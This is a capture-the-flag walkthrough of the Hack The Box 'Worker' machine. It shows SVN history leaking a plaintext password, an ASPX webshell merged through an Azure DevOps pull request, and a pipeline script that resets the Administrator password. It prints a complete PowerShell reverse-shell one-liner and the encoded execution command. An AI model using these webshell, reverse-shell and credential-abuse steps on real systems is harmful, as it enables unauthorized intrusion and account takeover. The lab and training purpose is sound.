Hack The Box - Worker Walkthrough without Metasploit

Worker: Windows box rated as Medium. We will face a SVN repository, with a bit of enumeration we will be able to enter in the box and then using SVN Pipelines we will gain Administrator access.

Worker

Enumeration

Run nmap against our target 10.10.10.203 with the following flags:

-sC Script scan, equivalent to --script=default

-sV Service version info

-p- Scan all ports

nmap -sC -sV -p- 10.10.10.203

Worker Enumeration

Http

We discover a web page on port 80 which doesn't seem to have much at first glance:

Page on port 80

But as always, when we encounter a web page, we run gobuster against it:

gobuster dir -u 10.10.10.203 -w /usr/share/wordlists/dirb/common.txt -t 40 -e

Gobuster Scan

We didn't get much from this port (also ran the command with bigger wordlists and -x to add some common windows extensions such as asp or aspx along with jsp, html, php, db, txt, xml but we got no luck either)

Svn

There's a svn Subversion, running on port 3690.

Subversion: Is a VCS (Version Control System)... it's "like" Git with some differences...

Centralized instead of distributed

You must be connected to make commits

Each user can have just one copy of the trunk

Branching or merging is... well quite time-consuming

Maybe that's why less than 10% of the professional devs use it... and i guess those that use it are because they are forced to...) But it came like 5 years before Git. In case someone wants to know a bit more about it:

Apache Subversion

Checkout

We are going to checkout whatever repository we have there:

svn checkout svn://10.10.10.203

SVN checkout

The most interesting file here is moved.txt:

moved.txt

We found a new Host to add to our /etc/hosts:

sudo nano /etc/hosts

/etc/hosts

Now we can try to access that url:

devops.worker.htb

Gathering info from SVN

So, we need some credentials to access here... Let's dig a bit more on that svn repository we just downloaded in order to see if we can find something useful:

svn info

SVN Info

We got the Revision number, which is 5 and the name of a user nathen.

SVN diff

The revision number is actually really important, this means we can compare this revision to the previous four and see if there are some differences:

svn diff -r <Revision Number>

Revision 5 vs Revision 4

The only change is the moved.txt that we saw before, let's try a different revision:

Revision 5 vs Revision 3

We can confirm the user nathen and... was there some password in plain text!? We have to take a look at Revision 2:

Revision 5 vs Revision 2

Repository

Now we have a user nathen and password wendel98, if we try to use it on http://devops.worker.htb

Svn Repository

Clicking on SmartHotel360 will take us to the following page:

Repos

Here we can see the Repositories:

Master

Exploitation

We are going to try and use the SVN repository to gain access to the box, in order to do so we must be able to make some changes to master and upload a page that allow us to execute commands on the machine, since it's IIS 10.0 the page has to be either asp or aspx.

Foothold

Tried to commit directly on master, but we were unable to do so, we are going to create a new branch, make some changes and then do a pull request.

On Repos go to Branches, New Branch, give your branch a name and Create branch:

Branch Creation

Click on our new created branch:

evilbranch

Now upload a cmdasp.aspx (We have one ready to use in our Kali located on '/usr/share/webshells/aspx/cmdasp.aspx')

Click on Upload File(s), browse... and then select our cmdasp.aspx:

Uploading cmdasp.aspx

We also have to link a work item to the commit:

Work items linked

Now we just click on commit and we'll be able to see the new commit id, and the aspx file on the branch successfully uploaded.

Committed changes

We have to click on Create a pull request (we can see it on the commit id on the previous picture).

Create a New Pull Request of our evilbranch into master, selecting Nathalie (our user) as Reviewer:

Pull request

If we take a long time to do this process, we may face this problem:

branch deleted

In order to avoid it we have to prepare what we want to do and do it as fast as possible, now we have to repeat the process and will have to use another branch name too.

Once we are back at this point, we have to approve the commit:

Approve commit

And Set auto-complete:

Set Auto-Complete

Set auto-complete accept

It will automatically complete the pull request

Pull Request Completed

If we go to the master branch now, we should be able to see our cmd page there:

cmd aspx included

If we look closely, we will see next to master there is a subdomain name spectral so in order to access our new feature we need to add that to our /etc/hosts:

new subdomain

Now if we try to access our new feature:

Error accessing cmdasp

It was deleted, we really have to move fast in order to be able to get access to this machine it seems. So, we are going to prepare all the steps now, the cmdasp.aspx and the command we will use on it to gain access, which will be an encoded reverse.ps1 script.

We prepare an encoded reverse powershell script

Reverse Powershell script:

$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes=0..655535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();

We encode it with our PSEnconder.py:

GitHub - 4st1nus/PSEncoder: A simple python script to encode powershell commandsGitHub

python3 PSEncoder.py /path/to/our/reverse.ps1

PSEncoder.py

Now on the command shell we have in the page we enter the encoded powershell script with the following arguments

-Exec ByPass

-Nol

-Enc

PowerShell.exe -Exec ByPass -Nol -Enc <Encoded Payload>

Have a netcat listening on the port indicated and click on execute:

Entering our Reverse shell encoded

Listening on our Kali

Internal Enumeration

First let's take a look at the user we are after:

User robisl

We can see there are more than one volume on this box:

Volume W

If we go into that volume and take a look around, we will see a passwd file under svnrepos/www/conf

robisl password

Impersonating the user

Let's use the tool evil-winrm to enter as robisl with that password:

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentestingGitHub

evil-winrm -i <ip> -u <user> -p <password>

Evil-Winrm as user

We are in as robisl and we can grab our user flag, now let's try to escalate privileges, in order to do that we are going to try and access the repository as robisl.

Privilege Escalation

Log in devops.worker.htb as robisl

Repository as Robin

In order to escalate privileges we are going to exploit the Pipelines feature:

New Pipeline

Since the Repository is an Azure Repos Git:

Azure Repos Git

Select our Repository:

Repository

Create a Starter pipeline:

Starter Pipeline

The important thing here to modify is the script part:

Default pipeline

We get rid of everything not needed and change the net user Administrator password on the script:

Modified Pipeline

Save and run:

Run Pipeline

We wait a bit meanwhile it does everything, we should have this:

Pipeline executed

Let's try evi-winrm again with our new creds.

Pwnd

Administrator

We can grab the root flag ;)